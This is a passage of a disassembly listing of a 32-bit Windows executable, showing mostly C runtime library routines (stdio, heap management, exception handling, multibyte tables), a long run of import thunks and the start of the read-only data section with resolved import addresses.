; [000007DA BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_4033BF dd offset loc_402E01 ; DATA XREF: __output+85�r
dd offset loc_402C71 ; jump table for switch statement
dd offset loc_402C8E
dd offset loc_402CDA
dd offset loc_402D1B
dd offset loc_402D24
dd offset loc_402D62
dd offset loc_402E43
; ---------------------------------------------------------------------------
mov eax, offset off_40B068
retn
; [000000A6 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [00000168 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]
xor eax, eax
loc_40390C: ; CODE XREF: .text:00403919�j
cmp ecx, dword_40B2E8[eax*8]
jz short loc_40391B
inc eax
cmp eax, 13h
jb short loc_40390C
loc_40391B: ; CODE XREF: .text:00403913�j
shl eax, 3
cmp ecx, dword_40B2E8[eax]
jnz short loc_40392D
mov eax, off_40B2EC[eax]
retn
; ---------------------------------------------------------------------------
loc_40392D: ; CODE XREF: .text:00403924�j
xor eax, eax
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_xcptlookup:
mov ecx, dword_40B400
mov eax, offset dword_40B380
push esi
loc_403975: ; CODE XREF: .text:00403988�j
cmp [eax], edx
jz short loc_40398A
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:40B380h[esi*4]
cmp eax, esi
jb short loc_403975
loc_40398A: ; CODE XREF: .text:00403977�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:40B380h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_40399D
cmp [eax], edx
jz short locret_40399F
loc_40399D: ; CODE XREF: .text:00403997�j
xor eax, eax
locret_40399F: ; CODE XREF: .text:0040399B�j
retn
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___CppXcptFilter:
mov eax, 0E06D7363h
cmp [esp+4], eax
jnz short loc_403B29
push dword ptr [esp+8]
push eax
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_403B29: ; CODE XREF: .text:00403B1A�j
xor eax, eax
retn
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F80 proc near ; CODE XREF: start:loc_402102�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_409630
call __SEH_prolog
mov [ebp+var_1C], offset dword_409E2C
loc_403F93: ; CODE XREF: sub_403F80+3C�j
cmp [ebp+var_1C], offset dword_409E2C
jnb short loc_403FBE
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403FB4
call eax
jmp short loc_403FB4
; ---------------------------------------------------------------------------
loc_403FAD: ; DATA XREF: .rdata:stru_409630�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403FB1: ; DATA XREF: .rdata:stru_409630�o
mov esp, [ebp+ms_exc.old_esp]
loc_403FB4: ; CODE XREF: sub_403F80+27�j
; sub_403F80+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403F93
; ---------------------------------------------------------------------------
loc_403FBE: ; CODE XREF: sub_403F80+1A�j
call __SEH_epilog
retn
sub_403F80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_403FC4(void)
sub_403FC4 proc near ; DATA XREF: __cinit:loc_4025DC�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_409640
call __SEH_prolog
mov [ebp+var_1C], offset dword_409E34
loc_403FD7: ; CODE XREF: sub_403FC4+3C�j
cmp [ebp+var_1C], offset dword_409E34
jnb short loc_404002
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_403FF8
call eax
jmp short loc_403FF8
; ---------------------------------------------------------------------------
loc_403FF1: ; DATA XREF: .rdata:stru_409640�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_403FF5: ; DATA XREF: .rdata:stru_409640�o
mov esp, [ebp+ms_exc.old_esp]
loc_403FF8: ; CODE XREF: sub_403FC4+27�j
; sub_403FC4+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_403FD7
; ---------------------------------------------------------------------------
loc_404002: ; CODE XREF: sub_403FC4+1A�j
call __SEH_epilog
retn
sub_403FC4 endp
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__heap_term:
cmp dword_40C564, 3
jnz short loc_4040E5
push ebx
xor ebx, ebx
cmp dword_40C548, ebx
push ebp
mov ebp, ds:dword_40906C
jle short loc_4040D3
push esi
mov esi, dword_40C54C
push edi
mov edi, ds:dword_409098
add esi, 0Ch
loc_40409F: ; CODE XREF: .text:004040CF�j
push 4000h
push 100000h
push dword ptr [esi]
call edi ; VirtualFree
push 8000h
push 0
push dword ptr [esi]
call edi ; VirtualFree
push dword ptr [esi+4]
push 0
push dword_40C560
call ebp ; RtlFreeHeap
add esi, 14h
inc ebx
cmp ebx, dword_40C548
jl short loc_40409F
pop edi
pop esi
loc_4040D3: ; CODE XREF: .text:0040408C�j
push dword_40C54C
push 0
push dword_40C560
call ebp ; RtlFreeHeap
pop ebp
pop ebx
loc_4040E5: ; CODE XREF: .text:0040407A�j
push dword_40C560
call ds:dword_409090 ; HeapDestroy
retn
; ---------------------------------------------------------------------------
mov eax, dword_40C560
retn
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __get_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
___sbh_heapmin:
mov eax, dword_40C544
test eax, eax
jz locret_404B59
mov ecx, dword_40C55C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
push 8000h
push ecx
call ds:dword_409098 ; VirtualFree
mov ecx, dword_40C55C
mov eax, dword_40C544
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_40C544
mov eax, [eax+10h]
mov ecx, dword_40C55C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_40C544
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_40C544
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404B00
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_40C544
loc_404B00: ; CODE XREF: .text:00404AF5�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_404B52
cmp dword_40C548, 1
jle short loc_404B52
push dword ptr [eax+10h]
push 0
push dword_40C560
call ds:dword_40906C ; RtlFreeHeap
mov eax, dword_40C548
mov edx, dword_40C54C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_40C544
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call _memcpy_0
add esp, 0Ch
dec dword_40C548
loc_404B52: ; CODE XREF: .text:00404B04�j
; .text:00404B0D�j
and dword_40C544, 0
locret_404B59: ; CODE XREF: .text:00404A90�j
retn
; [00000319 BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_40C274
mov dword_40C274, ecx
retn
; ---------------------------------------------------------------------------
mov eax, dword_40C274
retn
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000005F BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __open_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [000001F0 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [00000116 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, off_40B59C
retn
; ---------------------------------------------------------------------------
mov eax, off_40B598
retn
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_405A7E. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_405A6A proc near ; DATA XREF: .rdata:stru_409B58�o
xor eax, eax
inc eax
retn
sub_405A6A endp
; =============== S U B R O U T I N E =======================================
sub_405A6E proc near ; DATA XREF: .rdata:stru_409B58�o
mov esp, [ebp-18h]
sub_405A6E endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_405A7E. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_405A7E. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000095 BYTES: COLLAPSED FUNCTION __aulldvrm. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [000002D0 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push dword ptr [esp+0Ch]
push 40h
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call __sopen
add esp, 10h
retn
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
push 0
push dword ptr [esp+0Ch]
call _x_ismbbtype
add esp, 0Ch
retn
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_getSystemCP:
and dword_40C294, 0
cmp eax, 0FFFFFFFEh
jnz short loc_406330
mov dword_40C294, 1
jmp ds:dword_4090B8
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: .text:0040631E�j
cmp eax, 0FFFFFFFDh
jnz short loc_406345
mov dword_40C294, 1
jmp ds:dword_4090B4
; ---------------------------------------------------------------------------
loc_406345: ; CODE XREF: .text:00406333�j
cmp eax, 0FFFFFFFCh
jnz short locret_406359
mov eax, dword_40C2FC
mov dword_40C294, 1
locret_406359: ; CODE XREF: .text:00406348�j
retn
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __getmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_40B6A8
jmp short loc_406834
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [0000009F BYTES: COLLAPSED FUNCTION __lseeki64. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_40C304
mov dword_40C304, ecx
retn
; ---------------------------------------------------------------------------
___buffer_overrun:
push 0
push 1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [0000015C BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_strncnt:
mov ecx, [esp+4]
test ecx, ecx
jz short loc_40738F
loc_407384: ; CODE XREF: .text:0040738D�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_407390
inc eax
test ecx, ecx
jnz short loc_407384
loc_40738F: ; CODE XREF: .text:00407382�j
dec ecx
loc_407390: ; CODE XREF: .text:00407388�j
mov eax, [esp+4]
sub eax, ecx
dec eax
retn
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__chvalidator:
mov eax, [esp+4]
mov ecx, off_40B598
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+8]
retn
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 2
jmp ds:dword_409000
; ---------------------------------------------------------------------------
jmp ds:dword_409004
; ---------------------------------------------------------------------------
jmp ds:dword_409008
; ---------------------------------------------------------------------------
jmp ds:dword_40900C
; ---------------------------------------------------------------------------
jmp ds:dword_409010
; ---------------------------------------------------------------------------
jmp ds:dword_409014
; ---------------------------------------------------------------------------
jmp ds:dword_409018
; ---------------------------------------------------------------------------
jmp ds:dword_40901C
; ---------------------------------------------------------------------------
jmp ds:dword_409020
; ---------------------------------------------------------------------------
jmp ds:dword_409024
; ---------------------------------------------------------------------------
jmp ds:dword_409028
; ---------------------------------------------------------------------------
jmp ds:dword_40902C
; ---------------------------------------------------------------------------
jmp ds:dword_409030
; ---------------------------------------------------------------------------
jmp ds:dword_409034
; ---------------------------------------------------------------------------
jmp ds:dword_409038
; ---------------------------------------------------------------------------
jmp ds:dword_40903C
; ---------------------------------------------------------------------------
jmp ds:dword_409040
; ---------------------------------------------------------------------------
jmp ds:dword_409044
; ---------------------------------------------------------------------------
jmp ds:dword_409048
; ---------------------------------------------------------------------------
jmp ds:dword_40904C
; ---------------------------------------------------------------------------
jmp ds:dword_409050
; ---------------------------------------------------------------------------
jmp ds:dword_409054
; ---------------------------------------------------------------------------
jmp ds:dword_409058
; ---------------------------------------------------------------------------
jmp ds:dword_40905C
; ---------------------------------------------------------------------------
jmp ds:dword_409060
; ---------------------------------------------------------------------------
jmp ds:dword_409064
; ---------------------------------------------------------------------------
jmp ds:dword_409068
; ---------------------------------------------------------------------------
jmp ds:dword_40906C
; ---------------------------------------------------------------------------
jmp ds:dword_409070
; ---------------------------------------------------------------------------
jmp ds:dword_409074
; ---------------------------------------------------------------------------
jmp ds:dword_409078
; ---------------------------------------------------------------------------
jmp ds:dword_40907C
; ---------------------------------------------------------------------------
jmp ds:dword_409080
; ---------------------------------------------------------------------------
jmp ds:dword_409084
; ---------------------------------------------------------------------------
jmp ds:dword_409088
; ---------------------------------------------------------------------------
jmp ds:dword_40908C
; ---------------------------------------------------------------------------
jmp ds:dword_409090
; ---------------------------------------------------------------------------
jmp ds:dword_409094
; ---------------------------------------------------------------------------
jmp ds:dword_409098
; ---------------------------------------------------------------------------
jmp ds:dword_40909C
; ---------------------------------------------------------------------------
jmp ds:dword_4090A0
; ---------------------------------------------------------------------------
jmp ds:dword_4090A4
; ---------------------------------------------------------------------------
jmp ds:dword_4090A8
; ---------------------------------------------------------------------------
jmp ds:dword_4090AC
; ---------------------------------------------------------------------------
jmp ds:dword_4090B0
; ---------------------------------------------------------------------------
jmp ds:dword_4090B4
; ---------------------------------------------------------------------------
jmp ds:dword_4090B8
; ---------------------------------------------------------------------------
jmp ds:dword_4090BC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407FD6 proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_4090C0
sub_407FD6 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4090C4
; ---------------------------------------------------------------------------
jmp ds:dword_4090C8
; ---------------------------------------------------------------------------
jmp ds:dword_4090CC
; ---------------------------------------------------------------------------
jmp ds:dword_4090D0
; ---------------------------------------------------------------------------
jmp ds:dword_4090D4
; ---------------------------------------------------------------------------
jmp ds:dword_4090D8
; ---------------------------------------------------------------------------
jmp ds:dword_4090DC
; ---------------------------------------------------------------------------
jmp ds:dword_4090E0
; ---------------------------------------------------------------------------
jmp ds:dword_4090E4
; ---------------------------------------------------------------------------
jmp ds:dword_4090E8
; ---------------------------------------------------------------------------
jmp ds:dword_4090EC
; ---------------------------------------------------------------------------
jmp ds:dword_4090F0
; ---------------------------------------------------------------------------
jmp ds:dword_4090F4
; ---------------------------------------------------------------------------
jmp ds:dword_4090F8
; ---------------------------------------------------------------------------
jmp ds:dword_4090FC
; ---------------------------------------------------------------------------
jmp ds:dword_409100
; ---------------------------------------------------------------------------
jmp ds:dword_409104
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00001412 ( 5138.)
; Section size in file : 00001412 ( 5138.)
; Offset to raw data for section: 00009000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 409000h
dword_409000 dd 77E7F01Ah ; DATA XREF: sub_4014BE+80�r
; .text:00407EB6�r
dword_409004 dd 77E61A54h ; DATA XREF: sub_4014BE+78�r
; .text:00407EBC�r
dword_409008 dd 77E97F16h ; DATA XREF: sub_4014BE+5C�r
; .text:00407EC2�r
dword_40900C dd 77E61BB8h ; DATA XREF: sub_4014BE+45�r
; .text:00407EC8�r
dword_409010 dd 77E7A099h ; DATA XREF: sub_4014BE+28�r
; WinMain(x,x,x,x)+18�r ...
dword_409014 dd 77E7A5FDh ; DATA XREF: sub_401592+11�r
; unknown_libname_1+15�r ...
dword_409018 dd 77E79F93h ; DATA XREF: sub_401592+A�r
; .text:00401FBB�r ...
dword_40901C dd 77E616B4h ; DATA XREF: sub_4015BE+161�r
; WinMain(x,x,x,x)+10F�r ...
dword_409020 dd 77EB9953h ; DATA XREF: sub_4015BE+144�r
; .text:00407EE6�r
dword_409024 dd 77E61A90h ; DATA XREF: sub_4015BE+F4�r
; WinMain(x,x,x,x)+EF�r ...
dword_409028 dd 77E7C4B7h ; DATA XREF: sub_4015BE+59�r
; .text:00407EF2�r
dword_40902C dd 77E79824h ; DATA XREF: sub_4015BE+33�r
; .text:00407EF8�r
dword_409030 dd 77E6E154h ; DATA XREF: WinMain(x,x,x,x)+FF�r
; .text:00407EFE�r
dword_409034 dd 77E7980Ah ; DATA XREF: WinMain(x,x,x,x)+98�r
; ___sbh_alloc_new_region+7E�r ...
dword_409038 dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+27�r
; .text:00407F0A�r
dword_40903C dd 77E6177Ah ; DATA XREF: start+160�r __ioinit+57�r ...
dword_409040 dd 77E7C938h ; DATA XREF: start:loc_40211B�r
; .text:00407F16�r
dword_409044 dd 77E7C657h ; DATA XREF: start+20�r .text:00407F1C�r
dword_409048 dd 77F516F8h ; DATA XREF: __heap_alloc+3E�r
; ___sbh_heap_init+D�r ...
dword_40904C dd 77F5157Dh ; DATA XREF: __read+8E�r __read+158�r ...
dword_409050 dd 77E78B82h ; DATA XREF: __read+84�r __read+14E�r ...
dword_409054 dd 77E75CB5h ; DATA XREF: unknown_libname_1+29�r
; sub_405A7E-7�r ...
dword_409058 dd 77E79C90h ; DATA XREF: _doexit+13�r
; .text:00407F3A�r
dword_40905C dd 77E7C931h ; DATA XREF: __ioinit+19C�r
; .text:00407F40�r
dword_409060 dd 77E79C3Dh ; DATA XREF: __ioinit+157�r
; __NMSG_WRITE+14E�r ...
dword_409064 dd 77E78406h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r ...
dword_409068 dd 77E78C81h ; DATA XREF: __lseek+43�r
; __lseeki64+52�r ...
dword_40906C dd 77F51597h ; DATA XREF: _free+30�r .text:00404086�r ...
dword_409070 dd 77E77963h ; DATA XREF: __close+65�r __sopen+1E4�r ...
dword_409074 dd 77E79D8Ch ; DATA XREF: __NMSG_WRITE+155�r
; __write+F4�r ...
dword_409078 dd 77EB9A84h ; DATA XREF: __XcptFilter+167�r
; .text:00407F6A�r
dword_40907C dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
; .text:00407F70�r
dword_409080 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_403F35�r
; .text:00407F76�r
dword_409084 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
; .text:00407F7C�r
dword_409088 dd 77E79924h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_403ECD�r
; _wctomb+47�r ...
dword_40908C dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
; .text:00407F88�r
dword_409090 dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
; .text:004040EB�r ...
dword_409094 dd 77E7C726h ; DATA XREF: __heap_init+11�r
; .text:00407F94�r
dword_409098 dd 77E79E34h ; DATA XREF: .text:00404096�r
; ___sbh_free_block+22F�r ...
dword_40909C dd 77F5722Fh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+FD�r ...
dword_4090A0 dd 77E73196h ; DATA XREF: ___sbh_heap_check+1B�r
; ___sbh_heap_check+55�r ...
dword_4090A4 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_405447�r
; __free_osfhnd:loc_4054C1�r ...
dword_4090A8 dd 77E73FF9h ; DATA XREF: unknown_libname_2+2C�r
; .text:00407FB2�r
dword_4090AC dd 77E7A837h ; DATA XREF: __sopen+1CC�r
; .text:00407FB8�r
dword_4090B0 dd 77E805D8h ; DATA XREF: ___crtMessageBoxA+18�r
; .text:00407FBE�r
dword_4090B4 dd 77E7A13Fh ; DATA XREF: .text:0040633F�r
; __setmbcp+42�r ...
dword_4090B8 dd 77E6C703h ; DATA XREF: .text:0040632A�r
; __setmbcp+2B�r ...
dword_4090BC dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_4090C0 dd 77F6183Eh ; DATA XREF: sub_407FD6�r
